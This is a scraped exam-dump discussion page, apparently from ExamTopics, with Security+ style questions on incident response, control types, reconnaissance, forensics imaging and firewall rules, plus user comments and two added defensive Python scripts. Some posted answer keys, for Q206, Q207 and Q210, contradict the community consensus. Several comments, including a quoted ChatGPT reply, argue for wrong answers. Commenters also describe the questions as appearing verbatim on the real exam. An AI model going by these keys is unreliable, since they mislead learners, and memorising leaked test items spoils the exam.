Selected Answer: D
Is this not artifacts in the form of a hash/checksum to validate data integrity?
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Scratch this, I'm going with A
upvoted 5 times

  ostralo 3 months, 3 weeks ago


Artifacts are tracks that get left behind. You could associate them with the footprints of the end-user or hacker.
upvoted 2 times


Question #206 Topic 1

The Chief Information Security Officer (CISO) of a bank recently updated the incident response policy. The CISO is concerned that members of the
incident response team do not understand their roles. The bank wants to test the policy but with the least amount of resources or impact. Which
of the following BEST meets the requirements?

A. Warm site failover

B. Tabletop walk-through

C. Parallel path testing

D. Full outage simulation

Correct Answer: C

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Tabletoppp
upvoted 11 times

  RonWonkers Most Recent  4 months, 1 week ago


Selected Answer: B
B is correct
upvoted 1 times

  redsidemanc2 4 months, 3 weeks ago


Speaking is free.

Info:
Tabletop exercises
• Performing a full-scale disaster drill can be costly – and time consuming
• Many of the logistics can be determined through analysis – you don't physically have to go through a disaster or drill
• Get key players together for a tabletop exercise – talk through a simulated disaster
upvoted 2 times

  Strykar 4 months, 1 week ago


Source: Professor Messer :)
upvoted 1 times

  redsidemanc2 4 months, 3 weeks ago


Tabletop is the answer here
upvoted 1 times

  FT1 5 months ago


C-Parallel testing is a semi-automated testing process that relies on cloud technology and virtualization to perform tests against several
configurations at the same time. The goal of this process is to resolve the limitations of time and budget while still assuring quality.
upvoted 1 times

  derfnick 5 months ago


B. Because of "least amount of resources or impact"
upvoted 3 times

  Wildstar 5 months, 1 week ago


I can't even find "parallel path testing" in the Study Guide I'm using...
upvoted 3 times

  KetReeb 5 months ago


Probably: B: Tabletop Walk-through (or plain walkthroughs): Walkthroughs examine the actual steps that take place associated with a process,
procedure, or event... Walkthroughs are commonly used by audit personnel to ensure proper processes are being followed.
So this covers confirming the roles with minimal impact to production.
upvoted 2 times


  Joe1984 5 months ago


I googled it and it seems to be the correct answer.
upvoted 2 times


Question #207 Topic 1

Which of the following control types fixes a previously identified issue and mitigates a risk?

A. Detective

B. Corrective

C. Preventative

D. Finalized

Correct Answer: C

Community vote distribution


B (86%) 14%

  stoneface Highly Voted  5 months ago


Selected Answer: B
Corrective is correct
upvoted 12 times

  Renfri Highly Voted  1 month, 3 weeks ago


This question can be interpreted as:
Preventative = preventing this previous issue from happening again
Corrective = correcting this issue that has happened

FUCK YOU COMPTIA


upvoted 6 times

  [Removed] 1 month, 3 weeks ago


Lol.. Same thought.. But I will go with Corrective… Whether it's wrong or not…
upvoted 1 times

  BluEric Most Recent  2 months, 3 weeks ago


Selected Answer: B
For me, the keyword here is "fixes" , thus Corrective must be the right choice.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


I am assuming it is B, even though they use misleading words like "previously", which could mean something that happened in the past.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Corrective

Corrective controls remediate security issues that have already occurred. Restoring backups after a ransomware attack is an example of a
corrective control.
upvoted 2 times

  Tomtom11 3 months, 1 week ago


Selected Answer: C
Preventative
A preventative control is one that prevents specific actions from occurring, such as a mantrap prevents tailgating. Preventative controls act before an
event, preventing it from advancing. A firewall is an example of a preventative control, as it can block access to a specific resource.
upvoted 1 times

  tsqizel 2 months, 3 weeks ago


Yes but the question states "fixes a previously identified issue" whilst mitigating a risk, Preventative is preventing and mitigating future risk
whereas Corrective is patching an issue that has occurred and mitigating its risk. Cheers =)
upvoted 2 times

  Iphy23 3 months, 2 weeks ago


So which is going to be the correct answer according to the marking scheme... 'cos it's becoming confusing now
upvoted 2 times

  abrilo 3 months, 2 weeks ago


A corrective control is designed to mitigate any damage that was occurred because of a security event. ...pro messer
upvoted 1 times
  Zenvega 4 months ago
Selected Answer: C
I'm thinking, wouldn't this be C? Corrective resolves the issue, but Preventative resolves and mitigates future risk.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Negative, prevention mitigates future risk. Corrective patches vulnerabilities
upvoted 1 times

  Heroofatea 4 months, 1 week ago


Selected Answer: C
Corrective action prevents recurrence, while preventive action prevents occurrence. We're dealing with risk, not an incident.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Previous issue tells me this is a low priority incident
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Selected Answer: B
Corrective is correct
upvoted 1 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: B
Corrective controls include any measures taken to repair damage or restore resources and capabilities to their prior state following an
unauthorized or unwanted activity
upvoted 2 times


Question #208 Topic 1

An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded a malicious file that was quarantined by the AV
solution. The attacker utilized a local non-administrative account to restore the malicious file to a new location. The file was then used by another
process to execute a payload.
Which of the following attacks did the analyst observe?

A. Privilege escalation

B. Request forgeries

C. Injection

D. Replay attack

Correct Answer: C

Community vote distribution


C (89%) 11%

  stoneface Highly Voted  5 months ago


Selected Answer: C
"The file was then used by another process to execute a payload." -> Injection
upvoted 20 times

  stonefaces_kitten 2 months ago


I agree, thank you (:
upvoted 1 times

  deeden 4 months, 1 week ago


This is brilliant. Here's some additional material which might be of interest..
https://attack.mitre.org/techniques/T1055/012/
upvoted 1 times

  deeden 4 months, 1 week ago


But ultimately the goal is to escalate privileges.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


But they didn't escalate privileges. Which is stated in the question.
upvoted 1 times

  bragefagstad97 3 months, 4 weeks ago


This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security
context) of the injecting process.
upvoted 1 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: A
The analyst observed a Privilege escalation attack.

In a Privilege escalation attack, an attacker gains access to resources or information that are not normally available to their user account. In this
case, the attacker utilized a non-administrative account to restore a malicious file that was quarantined by the AV solution, thereby elevating their
privilege level and allowing the file to execute its payload.
upvoted 1 times

  Gary_Phillips_2007 1 month, 2 weeks ago


This is ChatGPT’s response:

Based on the information provided, the analyst observed an attack that involved privilege escalation.

In this attack, the attacker used a local non-administrative account to restore the malicious file to a new location, which likely required elevating
their privileges to do so. The attacker then used the restored file to execute a payload, indicating that they were able to successfully escalate
their privileges and gain greater access to the system.

Option A, privilege escalation, is therefore the correct answer.

Option B, request forgeries, involves manipulating requests to a server or system in order to gain unauthorized access or perform actions that
would not normally be allowed.

Option C, injection, refers to the injection of malicious code or data into a system, such as through SQL injection or cross-site scripting (XSS).

Option D, replay attack, involves reusing captured authentication or other data in order to gain unauthorized access to a system or network.
upvoted 1 times

  Sandon 1 week, 2 days ago


If you push ChatGPT further you get this.

"You are correct that the information provided in the question states that the attacker used a non-administrative account, rather than
escalating privileges. My apologies for any confusion. In this scenario, it is not specified which type of attack the analyst observed. The
information provided in the logs could indicate multiple types of attacks such as a malicious file being downloaded, quarantine bypass and
payload execution."
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
I see that many of you not choosing A. Please read carefully.

The analyst observed a privilege escalation attack. Privilege escalation occurs when an attacker gains access to higher-level privileges than they
are authorized to have. This can allow the attacker to perform actions that would normally be restricted, such as modifying system files or
accessing sensitive data. In the scenario you described, the attacker used a local non-administrative account to download a malicious file and
restore it to a new location. This required the attacker to have higher-level privileges than the non-administrative account would normally have,
indicating that they had successfully escalated their privileges. The attacker then used the malicious file to execute a payload, demonstrating the
additional capabilities they gained through privilege escalation.
upvoted 1 times

  viksap 1 month, 2 weeks ago


They used a NON-admin account
upvoted 1 times

  Sandon 1 month, 3 weeks ago


Wrong, again. It explicitly says they used a local non-admin account.
upvoted 1 times

  Nome02 2 months ago


Correct B: Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1])
or XSRF, is a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts.[2]
There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript
XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the
trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.[3] In a CSRF attack, an innocent end user is tricked
by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include
inadvertent client or server data leakage, change of session state, or manipulation of an end user's account.
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it
upvoted 1 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: C
Key words: "non-admin account" and "execute a payload", hence C is correct.
upvoted 2 times

  G4ct756 3 months, 1 week ago


Selected Answer: A
This is a privilege escalation. The attacker performs horizontal PE to move the files, then uses a process with higher privilege to execute the file.
upvoted 1 times

  Sandon 2 months, 4 weeks ago


Wrong, read it again
upvoted 2 times

  MarciaL 3 months, 2 weeks ago


B. Request forgeries
upvoted 1 times

  p610878 3 months, 3 weeks ago


Selected Answer: C
An injection attack is any exploitation that allows an attacker to submit code to a target system to modify its operations and/or poison and corrupt
its data set. This is also called remote code attacks or remote code exploits.
upvoted 2 times
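Whatever label the exam wants, the sequence in this question (AV quarantines a file, a non-admin account restores it to a different path, a second process then executes it) is a detectable chain. The script below is an added example, not from the page or the exam, that correlates those three steps on the file hash over constructed endpoint events; the event schema, the tool names (av.exe, avui.exe) and the account names are assumptions and do not follow any real AV or EDR product's telemetry.

```python
"""Detection-style view of the chain in Question #208: AV quarantines a file,
a non-admin account restores it to a new path, another process executes it.

Added example, not from the page or the exam. The event schema, tool and
account names are constructed and do not follow any real EDR/AV product."""

ADMIN_ACCOUNTS = {"CORP\\itadmin", "CORP\\svc_backup"}  # assumed privileged accounts

# Constructed endpoint events in time order; sha256 values are placeholders.
EVENTS = [
    {"ts": "10:00:01", "type": "download", "user": "CORP\\jdoe", "proc": "chrome.exe",
     "path": r"C:\Users\jdoe\Downloads\invoice.exe", "sha256": "aa11"},
    {"ts": "10:00:02", "type": "quarantine", "user": "SYSTEM", "proc": "av.exe",
     "path": r"C:\Users\jdoe\Downloads\invoice.exe", "sha256": "aa11"},
    {"ts": "10:03:10", "type": "restore", "user": "CORP\\jdoe", "proc": "avui.exe",
     "path": r"C:\Users\jdoe\AppData\Local\Temp\inv.exe", "sha256": "aa11"},
    {"ts": "10:03:30", "type": "process_create", "user": "CORP\\jdoe", "proc": "rundll32.exe",
     "path": r"C:\Users\jdoe\AppData\Local\Temp\inv.exe", "sha256": "aa11"},
    # Benign control case: an admin restores a false positive and nothing runs it.
    {"ts": "11:00:00", "type": "quarantine", "user": "SYSTEM", "proc": "av.exe",
     "path": r"C:\Tools\nmap.exe", "sha256": "bb22"},
    {"ts": "11:05:00", "type": "restore", "user": "CORP\\itadmin", "proc": "avui.exe",
     "path": r"C:\Tools\nmap.exe", "sha256": "bb22"},
]


def detect_quarantine_bypass(events, admins=ADMIN_ACCOUNTS):
    """Correlate quarantine -> restore -> execute on the file hash.

    Alerts only when the restore was done by a non-admin account and the
    restored file is then used by a process other than the one that restored it.
    """
    quarantined = {}  # sha256 -> quarantine event
    restored = {}     # sha256 -> restore event that followed the quarantine
    alerts = []
    for ev in events:
        h = ev["sha256"]
        if ev["type"] == "quarantine":
            quarantined[h] = ev
        elif ev["type"] == "restore" and h in quarantined:
            restored[h] = ev
        elif ev["type"] in ("process_create", "image_load") and h in restored:
            rst = restored[h]
            if rst["user"] in admins or ev["proc"] == rst["proc"]:
                continue  # admin-approved restore, or the same tool re-scanning it
            alerts.append({
                "sha256": h,
                "restored_by": rst["user"],
                "relocated": rst["path"] != quarantined[h]["path"],
                "executed_by": ev["proc"],
                "first_seen": quarantined[h]["ts"],
                "executed_at": ev["ts"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_quarantine_bypass(EVENTS):
        print(alert)
```

Keying on the hash rather than the path is what makes the "restore to a new location" step visible: the path changes, the content does not. The admin exclusion is a policy choice for this toy rule; in a real environment a restore by any account that then gets executed by a different process is worth a ticket, and the better control is not letting non-admin users restore from quarantine at all.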


Question #209 Topic 1

A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this
wireless network.
Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?

A. WPS

B. WPA2

C. WAP

D. HTTPS

Correct Answer: B

Community vote distribution


B (100%)

  passmemo Highly Voted  4 months, 2 weeks ago


Selected Answer: B
STRONGEST
upvoted 5 times

  alayeluwa 3 months, 3 weeks ago


Very very lol
upvoted 3 times


Question #210 Topic 1

An attacker browses a company's online job board attempting to find any relevant information regarding the technologies the company uses.
Which of the following BEST describes this social engineering technique?

A. Hoax

B. Reconnaissance

C. Impersonation

D. Pretexting

Correct Answer: C

Community vote distribution


B (96%) 4%

Joe1984 Highly Voted 5 months ago
Selected Answer: B
If you are just "Browsing", collecting information, wouldn't this be Reconnaissance?
upvoted 19 times

BigLao 3 months, 1 week ago
It says browsing an online job board; the attacker is impersonating a job-seeker.

How do you see it?


upvoted 1 times

rodwave 2 months, 3 weeks ago
An online job board is data available to the public (OSINT) so anybody can access this information. If there's any technologies listed, then
the company is fine with this information being known.

It could be impersonation as a job-seeker if the attacker had applied for the job, gotten an interview and during the interview the company
somehow disclosed all of their technologies that the fake job-seeker was looking for. This seems unlikely.
upvoted 2 times

stoneface 5 months ago
This is Passive Reconnaissance. So YESSS
upvoted 5 times

Sir_Learnalot Most Recent 2 months, 3 weeks ago
Selected Answer: B
This is OSINT (reconnaissance)
upvoted 2 times

abod050 2 months, 4 weeks ago
Selected Answer: B
for sure B
upvoted 2 times

zharis 3 months, 1 week ago
Selected Answer: C
Reconnaissance, which is an assessment activity, doesn't make any sense for the question.
upvoted 1 times

Sandon 1 week, 2 days ago
Impersonation is what doesn't make sense
upvoted 1 times

mark9999 3 months, 1 week ago
Who the hell is providing the answers to Exam Topics? This is obviously meant to be passive recon. It's an online job board; it doesn't say you
have to log in, so why would you be impersonating anyone? Don't overthink it.
upvoted 3 times

Iphy23 3 months, 2 weeks ago
This material seems to be confusing me rather than helping me prepare for the exam!!!
upvoted 2 times

Mperor 2 months, 3 weeks ago
Was so confident from the beginning. Now I am getting more confused, bro. This is clearly reconnaissance.
upvoted 1 times

alayeluwa 3 months, 3 weeks ago
Selected Answer: B
Recoooooooooooooon
upvoted 2 times

Fitzd 4 months, 3 weeks ago
Other common methods of passive reconnaissance include advanced Google searches, sifting through information stored on discarded devices,
and impersonating users.
upvoted 1 times

Swarupam 4 months, 4 weeks ago
Selected Answer: B
Has to be B. Impersonation is a form of social engineering attack where the attacker pretends to be someone else. Nothing related to the
question here.
upvoted 2 times

BigLao 3 months, 1 week ago
What if we look at it as the attacker pretending to be someone looking for a job since it says browsing a company's online job board
upvoted 1 times

Bman3001 5 months ago
The answer is Recon.
upvoted 2 times


Question #211 Topic 1

During an incident response process involving a laptop, a host was identified as the entry point for malware. The management team would like to
have the laptop restored and given back to the user. The cybersecurity analyst would like to continue investigating the intrusion on the host. Which
of the following would allow the analyst to continue the investigation and also return the laptop to the user as soon as possible?

A. dd

B. memdump

C. tcpdump

D. head

Correct Answer: B

Community vote distribution


A (86%) 14%

stoneface Highly Voted 5 months ago
Going to the exam - Wish me LUCK!
upvoted 59 times

Thanks_stoneface 1 day, 20 hours ago
I thought you wrote the exam and were reviewing the questions for fun
upvoted 1 times

Rusher 3 months ago
How did your exam go my friend? I was looking for your answers once reviewing the comments... I'm pretty sure you did well!
upvoted 1 times

Gino_Slim 3 months, 1 week ago
In stoneface we trust
upvoted 8 times

j0n45 4 months, 2 weeks ago
How did it go?
upvoted 2 times

ahmadawni Highly Voted 4 months, 3 weeks ago
Good luck guys, I have the exam after tomorrow. I would really like to thank this community and tell you all that I love you and wish you the best
of luck :)
upvoted 14 times

Gino_Slim 3 months, 1 week ago
I hope you did well my friend. This website doesn't allow reply notifications but we are wishing you well.
upvoted 1 times

ronniehaang Most Recent 4 days, 1 hour ago
Selected Answer: A
A. dd

The analyst should create a disk image of the laptop using the "dd" utility to preserve the state of the host and be able to continue their
investigation. This process involves creating an exact binary copy of the hard drive, including all data, partitions, and file systems. The analyst
can then restore the laptop to its original state by writing the image back to the hard drive. The disk image can be analyzed in a safe and isolated
environment to determine the cause of the intrusion and prevent future attacks.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
The analyst can use dd to continue the investigation and also return the laptop to the user as soon as possible. dd is a command-line utility that
is used to create a disk image of a storage device. By creating a disk image of the laptop using dd, the analyst can preserve the current state of
the device and continue the investigation without disrupting the user or altering the contents of the laptop. This would allow the analyst to
continue the investigation and also return the laptop to the user as soon as possible. memdump, tcpdump, and head are not directly related to
creating a disk image of a storage device and would not be effective for continuing the investigation while also returning the laptop to the user.
upvoted 3 times

carpathia 2 months, 3 weeks ago
Selected Answer: A
memdump is a Linux utility, so I would go with A. I am assuming memdump has to be run on the live system, which is not necessarily Linux
in our case. It must be dd.
upvoted 2 times
Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: A
dd will give you a raw image of the system that can be used in tools like Autopsy or FTK to analyse without the risk of damaging the original
data/device. It would also allow you to return the device and continue analysing the dd copy. So "A" it is.
upvoted 5 times

zharis 3 months, 1 week ago
Selected Answer: B
dd is used for disk imaging
upvoted 3 times

abrilo 3 months, 3 weeks ago
dd allows you to create a bit-by-bit copy of all of the information that may be on a drive or in a directory. This can obviously be very useful if you
need to capture this information in order to perform additional analysis later... from Professor Messer
upvoted 4 times

tswerv 4 months, 1 week ago
About to go to the exam today. Hopefully this will be my last time having to take the exam. Good luck to everyone
upvoted 4 times

tswerv 4 months, 1 week ago
update: I passed the exam with a 790!
upvoted 20 times

KelvinNguyen3011 3 months, 3 weeks ago
Did you find it difficult?
upvoted 2 times

Tony992 4 months, 1 week ago
Took the exam today and passed! All the PBQs from this dump were on the exam plus about 70% of the multiple-choice questions were
verbatim. I did notice a few of the questions were identical but some of the answers were different. Good luck everyone!
upvoted 7 times

enginne 4 months, 2 weeks ago
Selected Answer: A
I think that in the case of the memdump tool, CompTIA is referring to memory.
upvoted 2 times

Ay_ma 4 months, 2 weeks ago
A complete memory dump records all the contents of system memory when your computer stops unexpectedly. A complete memory dump may
contain data from processes that were running when the memory dump was collected. (microsoft.com)

dd allows us to copy raw data from one source to another. It lets us read from and write to block devices — for example, physical hard drives. We
could duplicate everything from one disk to another, including the partition table, the boot sector, and the access times of files in the filesystem
— in fact, everything on a raw data level.

My take on this is that memdump can be used to get the info, dd copies that info to a hard drive, so that the main laptop can be returned to the
user. Therefore, I'm leaning towards A.

Please correct me if I'm wrong.


upvoted 3 times

Ay_ma 4 months, 2 weeks ago
I've set my exam for this coming Monday. I wonder how many times people went through the questions before their exam. How many times do
you recommend?
upvoted 2 times

Ay_ma 4 months, 1 week ago
Eventually took the exam today. About 85% of my questions came from here, but I also used the CompTIA study guide to complement my
study.

Some of the questions had completely different answers to choose from, so having a good understanding of the questions and the answers
will do you good.

I advise that you memorize the simulations thoroughly, I had 3 of them on my test.

I passed with a 779, so not too bad. I wish you all good luck!
upvoted 8 times

Halaa 4 months, 2 weeks ago
I think twice is fine!
upvoted 1 times

k9_462 4 months, 2 weeks ago
I would use this guide daily for about a month. This guide is directly from the pass4sure engine with the original 211 questions. Keep in mind,
though, that pass4sure recently updated their program to have 246 questions. I can verify that the newly added questions were the 25% or so
questions I had on my test yesterday that were not contained in the original 211 question pool.
The problem is, they still have not updated all of the wrong answers they had (at least 40) and that's why this guide was so helpful. If you
understand the questions currently here, you will know enough to get you through... good luck...
upvoted 5 times

gen2dee 4 months, 2 weeks ago
mine is Monday too...good luck to us!
upvoted 3 times

k9_462 4 months, 3 weeks ago
Good luck to all that are preparing to take the exam.
Took mine this morning and passed. The best advice I can give is to pay close attention to the discussions and the rationale people use to come up with
an answer. It helped me immensely.
About 70% of the questions came directly from this pool and the rest were variations on the same questions being asked. If you pay attention to
the discussions, it will help you out a LOT... thank you everybody that contributed.
upvoted 8 times

j0n45 4 months, 4 weeks ago
Answer is D.
@Stoneface how did it go? 😊 I'd like to thank you for your efforts too, I saw you put many comments in the discussions that are very helpful.
upvoted 2 times

varun0 4 months, 4 weeks ago
Good luck bois
upvoted 2 times

comeragh 5 months ago
@stoneface. How did you get on with the exam??
upvoted 2 times


Question #212 Topic 1

An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a
server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the
secure alternatives for replacing them? (Choose three.)

A. SFTP, FTPS

B. SNMPv2, SNMPv3

C. HTTP, HTTPS

D. TFTP, FTP

E. SNMPv1, SNMPv2

F. Telnet, SSH

G. TLS, SSL

H. POP, IMAP

I. Login, rlogin

Correct Answer: BCF

Community vote distribution


BCF (100%)

rodwave 2 months, 3 weeks ago
Selected Answer: BCF
Answer: SNMPv2, SNMPv3 | HTTP, HTTPS | Telnet, SSH

SNMPv3 adds cryptographic security to SNMPv2. SNMPv3 replaces the simple password sharing (as clear text) in SNMPv2 with much more
securely encoded security parameters.

HTTPS is HTTP with encryption and verification. The only difference between the two protocols is that HTTPS uses TLS (SSL) to encrypt normal
HTTP requests and responses, and to digitally sign those requests and responses. As a result, HTTPS is far more secure than HTTP.

Telnet transfers the data in simple plain text. On the other hand, SSH uses an encrypted format to send data and also uses a secure channel. As SSH is
more secure, it uses public key encryption for authentication.
upvoted 3 times

comeragh 3 months, 3 weeks ago
Selected Answer: BCF
Agree with B,C,F here
upvoted 2 times

serginljr 4 months ago
Selected Answer: BCF
BCF correct
upvoted 3 times


Question #213 Topic 1

A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how
future incidents can be avoided. During which of the following stages of the response process will this activity take place?

A. Recovery

B. Identification

C. Lessons learned

D. Preparation

Correct Answer: C

Community vote distribution


C (100%)

garlandboy Highly Voted 4 months ago
Agree with C
upvoted 6 times

rodwave Most Recent 2 months, 3 weeks ago
Selected Answer: C
Answer: Lessons learned

The lessons learned (or remediation) step is the final phase of the incident response. It examines and documents how well the team responded,
discovers what caused the incident, and determines how the incident can be avoided in the future.
=======================
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.
upvoted 1 times

Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: C
CompTIA really loves lessons learned... I get the feeling that every incident response process question is about lessons learned.
upvoted 1 times

Gino_Slim 3 months, 1 week ago
Selected Answer: C
This is Lessons Learned. This takes place after everything has occurred and the team is trying to figure out how to do better.

Also, for anyone that has reached this point and realized that the discussions have become fewer and fewer: that's because a month ago the
questions stopped at #211. So from here on out it's just the newer participants.
upvoted 3 times


Question #214 Topic 1

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of
the following would BEST accomplish this goal?

A. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 67 -

Allow: Any Any 68 -

Allow: Any Any 22 -

Deny: Any Any 21 -


Deny: Any Any

B. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 67 -

Allow: Any Any 68 -

Deny: Any Any 22 -

Allow: Any Any 21 -


Deny: Any Any

C. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 22 -

Deny: Any Any 67 -

Deny: Any Any 68 -

Deny: Any Any 21 -


Allow: Any Any

D. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Deny: Any Any 67 -

Allow: Any Any 68 -


Allow: Any Any 22 -

Allow: Any Any 21 -


Allow: Any Any

Correct Answer: A

Community vote distribution


A (100%)

snofear Highly Voted 4 months ago
Selected Answer: A
A is correct, DHCP ports are 67,68, FTP:21, SFTP:22, and web pages are accessed through 443 and insecure http 80.
upvoted 10 times

ronniehaang Most Recent 4 days, 1 hour ago
Selected Answer: A
A. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 67 -

Allow: Any Any 68 -

Allow: Any Any 22 -

Deny: Any Any 21 -


Deny: Any Any

This firewall rule set would accomplish the goal of only allowing access to DHCP, web pages, and SFTP, and specifically blocking FTP. The
firewall would allow access to ports 80 and 443, which are the standard ports for web pages. Port 67 and 68 are the standard ports for DHCP.
Port 22 is the standard port for SFTP. FTP uses port 21, which is blocked in the rule set. The final rule, "Deny: Any Any" would block all other
traffic that does not match the allowed ports.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
A is the answer
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: A
This is just a breakdown of the ports:

67 & 68 = DHCP (Dynamic Host Configuration Protocol): DHCP is a client/server protocol that automatically provides IP addresses to clients. UDP
Port 67 is used by the DHCP server to dynamically assign IP addresses. UDP Port 68 is the DHCP client port, which is used by clients to obtain
an IP address from a DHCP server.

20 & 21 = FTP (File Transfer Protocol): FTP is used to communicate and transfer files between computers. TCP Port 20 is the "data port" where
the actual data transfer occurs and Port 21 is the "control port" where the client makes the connection request and management.

22 = SSH (Secure Shell) & SFTP (Secure File Transfer Protocol): SSH is a protocol that enables two computers to communicate securely by
encrypting the connection. SFTP is a secure file transfer protocol that uses SSH encryption to securely send and receive file transfers.

80 & 443 = HTTP / HTTPS: HTTP(80) is a default network port used to send and receive unencrypted web pages. HTTPS(443) is HTTP but uses
TLS to encrypt normal HTTP requests/responses.
upvoted 4 times

Gino_Slim 3 months, 1 week ago
You need to know your ports this time around. They are testing your knowledge on that. Look up common ports and try to hold those to memory.
That will help you with a few questions on the exam.
upvoted 3 times

comeragh 3 months, 3 weeks ago
Selected Answer: A
Agree with A being correct here. Initially narrowed it down to A and C and narrowed down further to A being correct answer as C was blocking
port 67/68 (DHCP)
upvoted 2 times


Ha9ate 4 months ago
Selected Answer: A
allow
http = 80
https = 443
DHCP client = 68
DHCP server = 67
SFTP = 22
deny
FTP = 21
upvoted 4 times
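As an added example (not code from ExamTopics or any commenter), the script below evaluates each of the four rule sets from Question #214 with first-match semantics against the stated requirement; the port numbers are the ones the comments list, and Telnet on port 23 is a constructed stand-in for "any other traffic", which the subnet must not be allowed to reach.

```python
"""
Constructed example for Question #214: a first-match firewall rule evaluator
that checks the four candidate rule sets against the requirement
"allow DHCP, web pages and SFTP; block FTP; nothing else".
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    port: Optional[int]    # None = any port (the trailing "Deny: Any Any" / "Allow: Any Any" rule)


def parse_ruleset(text: str) -> List[Rule]:
    """Parse lines in the page's format, e.g. 'Allow: Any Any 80 -' or 'Deny: Any Any'.
    Every rule on the page has Any source and Any destination, so only the port is kept."""
    rules: List[Rule] = []
    for raw in text.strip().splitlines():
        line = raw.strip().rstrip("-").strip()
        if not line or line.startswith("["):   # skip blanks and the column header
            continue
        action, rest = line.split(":", 1)
        fields = rest.split()                   # [source, destination, (port)]
        port = int(fields[2]) if len(fields) >= 3 else None
        rules.append(Rule(action.strip().lower(), port))
    return rules


def evaluate(rules: List[Rule], port: int) -> str:
    """First-match semantics: the first rule whose port matches decides.
    If nothing matches, assume the usual implicit deny."""
    for rule in rules:
        if rule.port is None or rule.port == port:
            return rule.action
    return "deny"


# Requirement from the question, using the port numbers given in the discussion.
# Port 23 (Telnet) is a constructed stand-in for "anything else", which must be
# denied because the subnet is supposed to reach ONLY DHCP, web pages and SFTP.
REQUIRED: Dict[str, Tuple[int, str]] = {
    "http": (80, "allow"),
    "https": (443, "allow"),
    "dhcp-server": (67, "allow"),
    "dhcp-client": (68, "allow"),
    "sftp": (22, "allow"),
    "ftp": (21, "deny"),
    "other (telnet 23)": (23, "deny"),
}


def check(rules: List[Rule]) -> Dict[str, Tuple[str, str]]:
    """Return {service: (expected, actual)} for every requirement the rule set violates.
    An empty dict means the rule set is compliant."""
    mismatches: Dict[str, Tuple[str, str]] = {}
    for service, (port, expected) in REQUIRED.items():
        actual = evaluate(rules, port)
        if actual != expected:
            mismatches[service] = (expected, actual)
    return mismatches


# The four candidate rule sets as listed in the question.
RULESETS: Dict[str, str] = {
    "A": """Allow: Any Any 80 -
Allow: Any Any 443 -
Allow: Any Any 67 -
Allow: Any Any 68 -
Allow: Any Any 22 -
Deny: Any Any 21 -
Deny: Any Any""",
    "B": """Allow: Any Any 80 -
Allow: Any Any 443 -
Allow: Any Any 67 -
Allow: Any Any 68 -
Deny: Any Any 22 -
Allow: Any Any 21 -
Deny: Any Any""",
    "C": """Allow: Any Any 80 -
Allow: Any Any 443 -
Allow: Any Any 22 -
Deny: Any Any 67 -
Deny: Any Any 68 -
Deny: Any Any 21 -
Allow: Any Any""",
    "D": """Allow: Any Any 80 -
Allow: Any Any 443 -
Deny: Any Any 67 -
Allow: Any Any 68 -
Allow: Any Any 22 -
Allow: Any Any 21 -
Allow: Any Any""",
}


def compliant_options() -> List[str]:
    """Names of the rule sets that satisfy every requirement (only 'A' does)."""
    return [name for name, text in RULESETS.items() if not check(parse_ruleset(text))]


if __name__ == "__main__":
    for name, text in RULESETS.items():
        problems = check(parse_ruleset(text))
        print(name, "OK" if not problems else problems)
```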


Question #215 Topic 1

While investigating a recent security incident, a security analyst decides to view all network connections on a particular server. Which of the
following would provide the desired information?

A. arp

B. nslookup

C. netstat

D. nmap

Correct Answer: C

Community vote distribution


C (100%)

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: C
Answer: netstat

The netstat command shows all active network connections, network interface information, and ports that are listening. The question is asking to
view all the connections on the server which the netstat command will do.

==================================
Nmap or network mapper is a network discovery and security auditing tool mainly used to find services, hosts, and open ports on a network.

Nslookup - This command queries DNS servers to obtain DNS records

ARP Command is a TCP/IP utility used for viewing and modifying the local Address Resolution Protocol (ARP) cache.
upvoted 8 times

